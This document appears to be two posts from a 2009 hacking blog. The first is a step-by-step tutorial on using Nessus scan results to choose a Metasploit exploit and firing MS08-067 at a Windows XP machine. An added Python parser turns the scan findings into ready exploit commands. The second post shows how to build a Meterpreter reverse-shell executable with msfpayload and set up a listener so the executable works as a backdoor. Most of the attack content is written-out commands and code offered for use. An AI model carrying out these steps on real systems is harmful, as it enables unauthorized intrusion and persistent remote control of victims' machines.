Sunday, March 29, 2009

Owning with Nessus and Metasploit

Today I'm going to show you how to use Nessus to create a vulnerability report that Metasploit can import, so that Metasploit can tell us which of its exploits match what our target is vulnerable to. Nessus is not included in BackTrack 4, so you either have to get it from Nessus's website or use apt-get. The command for apt-get is...
apt-get install nessus nessusd
Now that you have nessus installed, you need to run "nessusd" in a terminal window. Nessusd is the server side of nessus and it holds all of the plugins. Nessusd will take quite a while to load up, but once it's done, launch the client side of nessus (found in the menu, or run "nessus" in a terminal).

NOTE: You may have to add a user. Use "nessus-adduser" for this.

Now that you have nessus running, in the "Nessusd host" tab, put in the username and password. Now hit "Log in." This should connect the nessus client to your nessusd server (connecting may take a while). Now go over to the "Target" tab and put in the IP address of your target. Click "Start the scan." After a while, another window will pop up with your results. Save them in NBE format for later (e.g. /root/nessus.nbe); that is the format Metasploit's importer expects.

Now open a terminal window and go to your Metasploit Framework directory (mine is /pentest/exploits/framework3). Now run ./msfconsole. This will give you the Metasploit prompt, and now you can create a database to load our nessus NBE file into.
db_create /root/database.db
This will create the database in our root folder and connect to it. Now do "db_import_nessus_nbe /root/nessus.nbe" which will load in the nessus scan results.

Now do:
db_autopwn -t -x
Metasploit will check the imported results to see which exploits match the machine ("-t" only lists the matching exploit modules instead of launching them, and "-x" does the matching by vulnerability references). Now pick one of the exploits. I'm going to be using the MS08-067 exploit (the module is windows/smb/ms08_067_netapi) against a Windows XP SP2 machine.
use exploit/windows/smb/ms08_067_netapi
(change it to your exploit). Set the payload that you want. I'm going to be using Meterpreter.
set PAYLOAD windows/meterpreter/bind_tcp
Now set the IP address of your target in the RHOST variable (set RHOST <target ip>). Keep in mind that a bind payload opens a new listening port on the target, so if a firewall sits between you and the target, use windows/meterpreter/reverse_tcp and set LHOST to your own address instead.
Now you're ready to exploit!
exploit
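To see what Metasploit is actually working from when it imports the NBE file, here is a small parser for that format. This is an added example, not code from the original post and not Metasploit's own importer: it assumes the classic pipe-delimited NBE record layout (results|subnet|host|service (port/proto)|plugin id|severity|description, with newlines inside the description written as the two characters \n), the sample scan lines embedded in it are constructed rather than taken from a real scan, and the CVE-to-module table is a hand-written stand-in for Metasploit's reference matching with a single entry for MS08-067. The last function renders each match as the msfconsole commands walked through above.

```python
"""Parse a Nessus .nbe export and pair its findings with Metasploit modules."""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "host port proto plugin_id severity cves")

# Nessus 3.x severity labels as they appear in NBE (assumed layout).
SEVERITY_RANK = {"Security Hole": 3, "Security Warning": 2, "Security Note": 1}

# Hand-maintained CVE -> module table (assumption: a stand-in for Metasploit's
# own reference matching; extend it from the refs of modules you care about).
EXPLOIT_TABLE = {
    "CVE-2008-4250": "exploit/windows/smb/ms08_067_netapi",
}

# Constructed sample of an NBE export, not a real scan.
SAMPLE_NBE = """\
timestamps|||scan_start|Sun Mar 29 12:00:00 2009|
timestamps||192.168.1.5|host_start|Sun Mar 29 12:00:01 2009|
results|192.168.1|192.168.1.5|general/tcp|11936|Security Note|Remote operating system : Microsoft Windows XP SP2\\n
results|192.168.1|192.168.1.5|microsoft-ds (445/tcp)|34477|Security Hole|Synopsis :\\n\\nArbitrary code can be executed on the remote host due to a flaw in the 'Server' service.\\n\\nCVE : CVE-2008-4250\\nBID : 31874\\n
results|192.168.1|192.168.1.5|netbios-ssn (139/tcp)|11011|Security Note|An SMB server is running on this port.\\n
timestamps||192.168.1.5|host_end|Sun Mar 29 12:05:00 2009|
timestamps|||scan_end|Sun Mar 29 12:05:01 2009|
"""

_SERVICE_RE = re.compile(r"\((\d+)/(tcp|udp)\)")
_CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_service(service):
    """'microsoft-ds (445/tcp)' -> (445, 'tcp'); 'general/tcp' -> (0, 'tcp')."""
    m = _SERVICE_RE.search(service)
    if m:
        return int(m.group(1)), m.group(2)
    proto = service.rsplit("/", 1)[-1] if "/" in service else "tcp"
    return 0, proto


def parse_nbe(text):
    """Return a Finding for every 'results' record; skip timestamps and junk.

    The description is the last field and may itself contain '|', so the
    line is split into at most seven fields.
    """
    findings = []
    for line in text.splitlines():
        parts = line.split("|", 6)
        if len(parts) < 7 or parts[0] != "results":
            continue
        _, _subnet, host, service, plugin_id, severity, desc = parts
        if not plugin_id.isdigit():
            continue
        port, proto = parse_service(service)
        cves = sorted(set(_CVE_RE.findall(desc)))
        findings.append(Finding(host, port, proto, int(plugin_id), severity, cves))
    return findings


def match_exploits(findings, table=EXPLOIT_TABLE, min_severity="Security Warning"):
    """Pair findings with modules by CVE, ignoring informational noise."""
    threshold = SEVERITY_RANK.get(min_severity, 0)
    matches = []
    for f in findings:
        if SEVERITY_RANK.get(f.severity, 0) < threshold:
            continue
        for cve in f.cves:
            module = table.get(cve)
            if module:
                matches.append((f.host, f.port, cve, module))
    return matches


def msfconsole_commands(matches, payload="windows/meterpreter/bind_tcp"):
    """Render each match as the msfconsole command sequence from the post."""
    blocks = []
    for host, port, _cve, module in matches:
        blocks.append("\n".join([
            f"use {module}",
            f"set PAYLOAD {payload}",
            f"set RHOST {host}",
            f"set RPORT {port}",
            "exploit",
        ]))
    return blocks


if __name__ == "__main__":
    for block in msfconsole_commands(match_exploits(parse_nbe(SAMPLE_NBE))):
        print(block)
        print()
```

Feed it a real export with `parse_nbe(open("/root/nessus.nbe").read())`; the informational "Security Note" records (OS fingerprint, open SMB port) are parsed but dropped by the severity threshold, and only the 34477 finding, which carries CVE-2008-4250, produces a module.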
If everything went well, you should now have a Meterpreter session! I've already filmed this tutorial and I'm doing a little post-production work on it and I should have it uploaded tonight. Again, if you need to contact me, you can reach me at nulbyte [-@-]

Tuesday, March 24, 2009

Meterpreter as a backdoor

After finding THIS video on using meterpreter as a backdoor, I knew I had to make a post about it. I had been trying for a few days to get meterpreter to work as a backdoor, and I hadn't had much luck. This video tutorial was the answer to my prayers.

Now, I had to watch the video a few times because it was a tad bit confusing (unless you pay close attention). I'm hoping this little walk-through will make it clearer and easier to understand.

Step 1: Issue the command:
./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=5555 X > metexe.exe
(TIP: You must first be in your Metasploit Framework folder)

(Warning: metexe.exe will be detected by some antiviruses - tested with Antivir)

Let me explain what this all does, first of all, "./msfpayload" is the application we are going to run. "windows/meterpreter/reverse_tcp" is the payload we want made into a windows binary. "LHOST=" is a variable holding our (the attacker) IP address. "LPORT=5555" is a variable telling what port to connect back to. "X" (near the end of the command) instructs msfpayload to make it into a windows binary. Finally, "> metexe.exe" tells msfpayload where to save the file.

If you did everything correctly, you should now have a file named metexe.exe in the same directory that msfpayload is in (/pentest/exploits/framework3/, for example).

This is only half the battle, unfortunately. Sure this will connect back to us, but we don't have anything running on our attacker machine to accept the incoming connection. Let's fix this little problem.

Step 2: Start ./msfconsole

Step 3: Type these commands...

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your ip address>
set LPORT 5555
exploit

(TIP: Be sure to change LHOST to your IP address, the same one you gave msfpayload, and keep LPORT matching too)

You will notice that this won't actually exploit anything, it will simply create a listener to accept the meterpreter connection. Try putting metexe.exe onto a windows machine (I don't think it works on Vista, yet) and launch it. If all goes smoothly, your listener should tell you that it just received a connection.

I'm planning on making three more posts related to Meterpreter in the near future. One on how antiviruses react to the compiled payload (metexe.exe), the second one on how to actually use meterpreter, and the third on how to get meterpreter to run on startup using registry keys. Please note that the future posts are in no particular order and an ETA is not currently available.

Again, if you have any questions, comments, or concerns, please email me at nulbytesecurity [-@-]